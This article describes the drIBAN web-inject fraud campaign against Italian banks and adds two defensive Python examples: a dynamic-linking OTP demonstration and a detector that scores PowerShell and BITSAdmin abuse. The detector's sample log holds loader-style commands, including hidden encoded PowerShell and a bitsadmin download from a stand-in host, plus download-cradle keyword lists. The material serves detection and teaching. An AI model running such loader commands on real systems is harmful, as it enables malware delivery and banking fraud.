A financial fraud campaign built around a new web inject called drIBAN is currently targeting Italian banking customers. According to reports, the newly discovered tool can alter beneficiary account details while a transaction is in progress, so that the transferred amount lands in illegitimate, attacker-controlled bank accounts.
Researchers report that the campaign began compromising Italian corporate banks in 2019, paused in 2020, and resumed the following year, striking thousands of victims and continuing since.
The threat actors have gradually enhanced their operations on several fronts. Analysts noticed that the fraudsters have upgraded their social engineering and invest heavily in establishing persistence on a targeted network while evading security detection.
In addition, the adversaries commonly use the Automated Transfer System (ATS) technique to bypass anti-fraud controls such as Strong Customer Authentication (SCA) and multi-factor authentication (MFA), which financial institutions use widely.
Researchers confirmed that the fraud operations target Windows workstations in the banks, replacing legitimate beneficiary details with accounts operated by the attackers.
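The following is an added illustration of why an ATS-style beneficiary swap defeats an OTP that is tied only to the login session but not one bound to the payee and amount (what PSD2 calls dynamic linking). It is not code from the drIBAN report or from any bank; the server-side check, the shared key, the session id and the two IBANs are constructed sample values (both IBANs pass the ISO 13616 mod-97 check, which is the point: a mule account is a real, well-formed account, so format validation alone is no defence). The model assumes the details shown to the customer on the out-of-band device are the ones the customer intended, while the order reaching the server may have been changed in the browser.

```python
"""Transaction-bound SCA versus a session-bound OTP under a beneficiary substitution.

Added example for the drIBAN/ATS discussion; not the report's or any bank's code.
All keys, ids and IBANs below are constructed sample values.
"""
import hashlib
import hmac

# Constructed demo secret. In a real deployment this is a per-customer secret
# provisioned to the SCA device, never a constant in source.
SERVER_KEY = b"constructed-demo-key"


def iban_is_valid(iban: str) -> bool:
    """ISO 13616 mod-97 check. A substituted IBAN that points at a genuine mule
    account passes this check, so it only catches typos, not fraud."""
    s = iban.replace(" ", "").upper()
    if len(s) < 15 or not s.isalnum():
        return False
    rearranged = s[4:] + s[:4]
    # int(c, 36) maps 0-9 to themselves and A-Z to 10-35, as the standard requires
    digits = "".join(str(int(c, 36)) for c in rearranged)
    return int(digits) % 97 == 1


def otp_unbound(session_id: str) -> str:
    """Naive one-time code: tied to the session only, not to what is being paid."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()[:6]


def otp_dynamic_linked(session_id: str, amount_cents: int, beneficiary_iban: str) -> str:
    """Code derived from the exact payee and amount displayed to the customer
    on the second factor, so it cannot authorise a different payee."""
    payee = beneficiary_iban.replace(" ", "").upper()
    msg = f"{session_id}|{amount_cents}|{payee}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()[:6]


def server_accepts(order: dict, otp: str, dynamic_linking: bool) -> bool:
    """The bank's authorisation check, run on the order as actually received."""
    if not iban_is_valid(order["iban"]):
        return False
    if dynamic_linking:
        expected = otp_dynamic_linked(order["session"], order["amount_cents"], order["iban"])
    else:
        expected = otp_unbound(order["session"])
    return hmac.compare_digest(expected, otp)


def run_scenario(dynamic_linking: bool) -> dict:
    """Model one payment: what the customer confirms versus what the server receives."""
    # What the customer typed and what the second-factor device displays (constructed)
    intended = {"session": "s-1", "amount_cents": 125_000, "iban": "IT60X0542811101000000123456"}
    # What reaches the server after a client-side swap of the payee, modelled as a
    # plain dict copy; the substituted IBAN is a constructed, checksum-valid value
    submitted = dict(intended, iban="GB82WEST12345698765432")
    # The customer approves what they see, i.e. the intended order
    if dynamic_linking:
        otp = otp_dynamic_linked(intended["session"], intended["amount_cents"], intended["iban"])
    else:
        otp = otp_unbound(intended["session"])
    return {
        "substituted_iban_passes_checksum": iban_is_valid(submitted["iban"]),
        "fraud_order_authorised": server_accepts(submitted, otp, dynamic_linking),
        "genuine_order_authorised": server_accepts(intended, otp, dynamic_linking),
    }


if __name__ == "__main__":
    print("session-bound OTP:", run_scenario(dynamic_linking=False))
    print("dynamic linking:  ", run_scenario(dynamic_linking=True))
```

With the session-bound code the swapped order is authorised because the code says nothing about the payee; with dynamic linking the server recomputes the code over the IBAN it actually received, which no longer matches what the customer approved, while the genuine order still goes through. The practical consequence for defenders is that the payee and amount must be shown and bound on a channel the browser cannot rewrite.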
The drIBAN fraud campaign starts by deceiving targets.
According to investigations, the drIBAN fraud operation begins with a certified email, a particular type of email used in Italy, sent to deceive potential victims. These phishing emails carry an executable archive that downloads sLoad, a PowerShell-based recovery tool, onto the compromised device.
sLoad then gathers system information and exfiltrates it for analysis, which lets the fraudsters decide how to proceed. The campaign also relies on living-off-the-land (LotL) tactics, abusing legitimate tools such as PowerShell and BITSAdmin.
Once the operators judge a compromised admin worth pursuing, they drop the Ramnit banking trojan as the next-stage payload.
The current operators of the drIBAN campaign combine LotL and ATS tactics, which makes the campaign nearly invisible to standard signature-based security solutions. Its slow-and-steady approach further improves its effectiveness.
The emerging toolkit could evolve into an even more serious threat that challenges security vendors, so organisations should be aware of it and its tactics to reduce the risk of infection from these campaigns.
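Because the chain above leans on PowerShell and BITSAdmin rather than on custom binaries, signature matching on files is of little use; process-creation telemetry is where it shows. The following is an added example of behavioural scoring over such telemetry, not tooling from the report or from any vendor. The log lines are constructed in a simplified `field=value` layout standing in for Sysmon Event ID 1 or Security event 4688 (the host, users, paths and the base64 blob are made up), and the indicator weights and the alert threshold are starting points to be tuned per environment.

```python
"""Score process launches for living-off-the-land abuse of PowerShell and BITSAdmin.

Added example for the drIBAN LotL discussion; not the report's own tooling.
Sample telemetry, weights and threshold are constructed starting points.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry: two launches consistent with a loader stage, one
# scheduled inventory script and one administrative BITS listing.
SAMPLE_LOG = [
    'ts=2023-05-10T09:12:01Z host=WS-ACC-07 user=CORP\\m.rossi parent=C:\\Windows\\System32\\wscript.exe '
    'image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell.exe -nop -w hidden -ep bypass -enc QQBCAEMA"',
    'ts=2023-05-10T09:12:09Z host=WS-ACC-07 user=CORP\\m.rossi '
    'parent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'image=C:\\Windows\\System32\\bitsadmin.exe '
    'cmd="bitsadmin.exe /transfer upd /download /priority high http://example.invalid/u.dat C:\\Users\\Public\\u.dat"',
    'ts=2023-05-10T09:30:00Z host=WS-ACC-07 user="NT AUTHORITY\\SYSTEM" parent=C:\\Windows\\System32\\svchost.exe '
    'image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell.exe -NoProfile -File C:\\ProgramData\\Scripts\\inventory.ps1"',
    'ts=2023-05-10T10:02:44Z host=WS-ACC-07 user=CORP\\admin01 parent=C:\\Windows\\System32\\cmd.exe '
    'image=C:\\Windows\\System32\\bitsadmin.exe cmd="bitsadmin.exe /list /allusers"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Parents from which an interactive admin rarely launches these tools
SCRIPT_OR_MAIL_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                          "outlook.exe", "winword.exe", "excel.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer", "iwr ")
ALERT_THRESHOLD = 4


def parse_line(line: str) -> Dict[str, str]:
    """Split a field=value line into a dict, stripping quotes around values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_powershell(cmd: str) -> List[Tuple[str, int]]:
    """Weighted indicators for a PowerShell command line."""
    low = cmd.lower()
    tokens = low.split()
    hits = []
    if any(t in ("-e", "-ec", "-enc", "-encodedcommand") for t in tokens):
        hits.append(("encoded command", 3))
    if any(t in ("-w", "-win", "-windowstyle") for t in tokens) and "hidden" in tokens:
        hits.append(("hidden window", 2))
    if any(t in ("-ep", "-ex", "-executionpolicy") for t in tokens) and "bypass" in tokens:
        hits.append(("execution policy bypass", 2))
    if any(m in low for m in DOWNLOAD_MARKERS):
        hits.append(("download cradle", 3))
    if any(t in ("-nop", "-noprofile") for t in tokens):
        hits.append(("profile suppressed", 1))
    return hits


def score_bitsadmin(cmd: str) -> List[Tuple[str, int]]:
    """Weighted indicators for a bitsadmin.exe command line."""
    low = cmd.lower()
    tokens = low.split()
    hits = []
    if "/setnotifycmdline" in tokens:
        hits.append(("BITS job notify command (persistence)", 3))
    if any(t in ("/transfer", "/addfile") for t in tokens):
        hits.append(("BITS download job", 2))
    if "http://" in low or "https://" in low:
        hits.append(("remote URL", 1))
    if any(p in low for p in ("\\users\\public\\", "\\appdata\\", "\\temp\\")):
        hits.append(("user-writable destination", 1))
    return hits


def evaluate(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event; the parent only adds weight when the
    command line itself already carries indicators."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmd = event.get("cmd", "")
    hits: List[Tuple[str, int]] = []
    if image in ("powershell.exe", "pwsh.exe"):
        hits = score_powershell(cmd)
    elif image == "bitsadmin.exe":
        hits = score_bitsadmin(cmd)
    if hits and parent in SCRIPT_OR_MAIL_PARENTS:
        hits.append((f"spawned by {parent}", 2))
    score = sum(w for _, w in hits)
    return {"ts": event.get("ts"), "host": event.get("host"), "user": event.get("user"),
            "image": image, "score": score, "reasons": [r for r, _ in hits],
            "alert": score >= ALERT_THRESHOLD}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    return [evaluate(parse_line(line)) for line in lines]


def alerts(lines: List[str]) -> List[Dict[str, object]]:
    return [r for r in scan(lines) if r["alert"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        flag = "ALERT" if r["alert"] else "ok   "
        print(f'{flag} {r["ts"]} {r["user"]} {r["image"]} score={r["score"]} {", ".join(r["reasons"])}')
```

The two loader-stage lines score well above the threshold (hidden, encoded, policy-bypassing PowerShell launched by a script host, then a BITS download into a user-writable path spawned by that PowerShell), while the SYSTEM inventory script and the administrative `/list` stay quiet. Stacking weak indicators this way, rather than alerting on any single PowerShell flag, is what keeps such a rule usable on real estates where PowerShell and BITS are in legitimate daily use.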